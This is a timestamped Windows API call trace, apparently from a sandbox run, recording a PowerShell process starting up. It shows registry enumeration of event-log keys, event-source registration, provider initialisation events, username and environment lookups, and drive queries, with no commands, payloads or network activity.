	[0648.355] RegQueryInfoKeyW (in: hKey=0x384, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d10c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d108, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d10c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d108*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.355] CoTaskMemFree (pv=0x0) 
	[0648.355] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.355] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x0, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.356] CoTaskMemFree (pv=0x471920) 
	[0648.356] CoTaskMemFree (pv=0x0) 
	[0648.356] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.356] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x1, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.356] CoTaskMemFree (pv=0x471920) 
	[0648.356] CoTaskMemFree (pv=0x0) 
	[0648.356] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.356] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x2, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.356] CoTaskMemFree (pv=0x471920) 
	[0648.356] CoTaskMemFree (pv=0x0) 
	[0648.356] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.356] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x3, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.356] CoTaskMemFree (pv=0x471920) 
	[0648.356] CoTaskMemFree (pv=0x0) 
	[0648.356] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.356] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x4, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.357] CoTaskMemFree (pv=0x471920) 
	[0648.357] CoTaskMemFree (pv=0x0) 
	[0648.357] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.357] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x5, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.357] CoTaskMemFree (pv=0x471920) 
	[0648.357] CoTaskMemFree (pv=0x0) 
	[0648.357] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.357] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x6, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.357] CoTaskMemFree (pv=0x471920) 
	[0648.357] CoTaskMemFree (pv=0x0) 
	[0648.357] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.357] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x7, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.357] CoTaskMemFree (pv=0x471920) 
	[0648.357] CoTaskMemFree (pv=0x0) 
	[0648.357] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.357] RegEnumKeyExW (in: hKey=0x384, dwIndex=0x8, lpName=0x471920, lpcchName=0x24d198, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d198, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.357] CoTaskMemFree (pv=0x471920) 
	[0648.357] CoTaskMemFree (pv=0x0) 
	[0648.357] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x364) returned 0x0
	[0648.358] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.358] RegOpenKeyExW (in: hKey=0x384, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x388) returned 0x0
	[0648.358] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.358] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x38c) returned 0x0
	[0648.358] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.358] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x390) returned 0x0
	[0648.358] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.358] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x394) returned 0x0
	[0648.359] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.359] RegOpenKeyExW (in: hKey=0x384, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x398) returned 0x0
	[0648.359] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.359] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x39c) returned 0x0
	[0648.359] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.359] RegOpenKeyExW (in: hKey=0x384, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x3a0) returned 0x0
	[0648.359] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x0) returned 0x2
	[0648.359] RegOpenKeyExW (in: hKey=0x384, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x3a4) returned 0x0
	[0648.360] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1f8 | out: phkResult=0x24d1f8*=0x3a8) returned 0x0
	[0648.360] RegCloseKey (hKey=0x3a8) returned 0x0
	[0648.360] RegCloseKey (hKey=0x384) returned 0x0
	[0648.360] RegCloseKey (hKey=0x3a4) returned 0x0
	[0648.365] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b780008
	[0650.074] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e892a8*="WSMan", lpRawData=0x2e89018) returned 1
	[0650.077] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0650.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.077] CoTaskMemFree (pv=0x1b8c09c0) 
	[0650.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.080] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0650.080] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0650.080] CoTaskMemFree (pv=0x1b8cef60) 
	[0650.080] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0650.080] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0650.080] CoTaskMemFree (pv=0x471920) 
	[0650.081] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e8e7e0*="Alias", lpRawData=0x2e8e570) returned 1
	[0650.088] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0650.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.088] CoTaskMemFree (pv=0x1b8c09c0) 
	[0650.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.090] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0650.090] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0650.091] CoTaskMemFree (pv=0x1b8cef60) 
	[0650.091] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0650.091] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0650.091] CoTaskMemFree (pv=0x471920) 
	[0650.092] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e93dd8*="Environment", lpRawData=0x2e93b68) returned 1
	[0650.098] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0650.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.098] CoTaskMemFree (pv=0x1b8c09c0) 
	[0650.100] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0650.100] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0650.100] CoTaskMemFree (pv=0x1b8c09c0) 
	[0650.100] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0650.100] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0650.100] CoTaskMemFree (pv=0x1b8c09c0) 
	[0650.101] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x24d030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0650.101] SetErrorMode (uMode=0x1) returned 0x1
	[0650.101] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x24d240 | out: lpFileInformation=0x24d240*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.101] SetErrorMode (uMode=0x1) returned 0x1
	[0650.103] GetLogicalDrives () returned 0x4
	[0650.103] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.104] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.105] SetErrorMode (uMode=0x1) returned 0x1
	[0650.106] CoTaskMemAlloc (cb=0x68) returned 0x4dea90
	[0650.106] CoTaskMemAlloc (cb=0x68) returned 0x4dea20
	[0650.106] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x4dea90, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x24d210, lpMaximumComponentLength=0x24d20c, lpFileSystemFlags=0x24d208, lpFileSystemNameBuffer=0x4dea20, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24d210*=0x9c354b42, lpMaximumComponentLength=0x24d20c*=0xff, lpFileSystemFlags=0x24d208*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0650.106] CoTaskMemFree (pv=0x4dea90) 
	[0650.106] CoTaskMemFree (pv=0x4dea20) 
	[0650.106] SetErrorMode (uMode=0x1) returned 0x1
	[0650.106] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.108] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.108] SetErrorMode (uMode=0x1) returned 0x1
	[0650.108] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d1b0 | out: lpFileInformation=0x24d1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.108] SetErrorMode (uMode=0x1) returned 0x1
	[0650.108] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.108] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.108] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.109] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cd30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.109] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0650.110] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.110] SetErrorMode (uMode=0x1) returned 0x1
	[0650.110] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.110] SetErrorMode (uMode=0x1) returned 0x1
	[0650.110] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.110] SetErrorMode (uMode=0x1) returned 0x1
	[0650.110] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.110] SetErrorMode (uMode=0x1) returned 0x1
	[0650.111] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0650.111] SetErrorMode (uMode=0x1) returned 0x1
	[0650.111] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d080 | out: lpFileInformation=0x24d080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0650.111] SetErrorMode (uMode=0x1) returned 0x1
	[0650.111] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0650.111] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0650.112] CoTaskMemFree (pv=0x1b8cef60) 
	[0650.112] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0650.112] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0650.112] CoTaskMemFree (pv=0x471920) 
	[0650.113] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9aec8*="FileSystem", lpRawData=0x2e9ac58) returned 1
	[0650.129] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0650.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0650.130] CoTaskMemFree (pv=0x1b8c09c0) 
	[0650.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0650.132] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0650.132] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0650.132] CoTaskMemFree (pv=0x1b8cef60) 
	[0650.132] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0650.132] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0650.133] CoTaskMemFree (pv=0x471920) 
	[0650.133] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea0708*="Function", lpRawData=0x2ea0498) returned 1
	[0651.541] CoTaskMemAlloc (cb=0x104) returned 0x1b8c09c0
	[0651.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c09c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0651.541] CoTaskMemFree (pv=0x1b8c09c0) 
	[0651.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0651.576] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0651.576] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0653.218] CoTaskMemFree (pv=0x1b8cef60) 
	[0653.218] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0653.218] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0653.218] CoTaskMemFree (pv=0x471920) 
	[0653.219] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec2f30*="Registry", lpRawData=0x2ec2cc0) returned 1
	[0653.223] CoTaskMemAlloc (cb=0x804) returned 0x1b8cef60
	[0653.223] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8cef60, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0653.226] CoTaskMemFree (pv=0x1b8cef60) 
	[0653.226] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0653.226] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0653.227] CoTaskMemFree (pv=0x471920) 
	[0653.227] ReportEventW (hEventLog=0x1b780008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec8348*="Variable", lpRawData=0x2ec80d8) returned 1
